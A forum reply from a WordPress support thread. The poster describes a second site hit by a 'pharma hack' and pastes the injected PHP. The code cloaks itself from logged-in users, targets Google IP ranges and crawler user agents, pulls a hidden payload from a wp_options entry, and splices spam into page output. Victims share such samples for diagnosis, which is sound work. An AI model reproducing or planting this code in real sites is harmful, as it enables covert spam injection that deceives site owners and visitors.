Reply To: Weird pharma hack

Home Forums Support Forum Weird pharma hack Reply To: Weird pharma hack

#787
Grady Booch
Grady Booch
Member

Thanks, Eli!

BTW, my second site was hacked in a similar albeit subtly different way. In this case, the offending wp_options name/value pair is store in a different place (it’s named _property1) and the code that’s generated that’s injected just after a page’s body is this

 
if (!function_exists(“b_call”)) {
function b_call() {
if (!ob_get_level()) ob_start(“b_goes”);
}
function b_goes($p) {
if (!defined(‘wp_m1′)) {
$f1 = explode(‘|’, ’3639549952,8191.1123631104,8191.1089052672,8191.1078218752,2047.1078220802,1229.1087381508,1444.3512041472,4095.1113980928,4095.1208926208,16383.1249705984,65535|via translate.google.com,Google WAP Proxy,Google CHTML Proxy|tumblrbot’);
$f3=0;
$f2=ip2long($_SERVER["REMOTE_ADDR"]);
foreach(explode(‘.’, array_shift($f1)) as $line) {
list($a1,$a2)=explode(‘,’,$line);
if ($f2>=$a1&&$f2<=($a1+$a2)) {
$f3=1;
break;
}
}
foreach(array_reverse($f1,1) as $k=>$v) {
foreach(explode(‘,’, $v) as $line) {
if (stripos($_SERVER["HTTP_USER_AGENT"], $line) !== false) {
$f3=$k;
break;
}
}
}
if (!$f3 || isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists(‘is_user_logged_in’) && is_user_logged_in()) || (!$m = get_option(‘_property1′))) {
return $p;
}
list($m, $n) = @unserialize(trim(strrev($m)));
define(‘wp_m1′, $m);
define(‘wp_n1′, $n);
}
if (!stripos($p, wp_n1)) $p = preg_replace(“~<body[^>]*>~i”, “$0\n”.wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace(“~</head>~”, wp_m1.”\n</head>”, $p, 1);
if (!stripos($p, wp_n1)) $p = preg_replace(“~</div>~”, “</div>\n”.wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace(“~</div>~”, wp_m1.”\n</div>”, $p, 1);
return $p;
}
function b_end() {
@ob_end_flush();
}
if (ob_get_level()) ob_end_clean();
add_action(“init”, “b_call”);
add_action(“wp_head”, “b_call”);
add_action(“get_sidebar”, “b_call”);
add_action(“wp_footer”, “b_call”);
add_action(“shutdown”, “b_end”);
}

but, it has the same effect (the value of the spam was the same for both sites, although the code was different as above and the name of the wp_option item was different.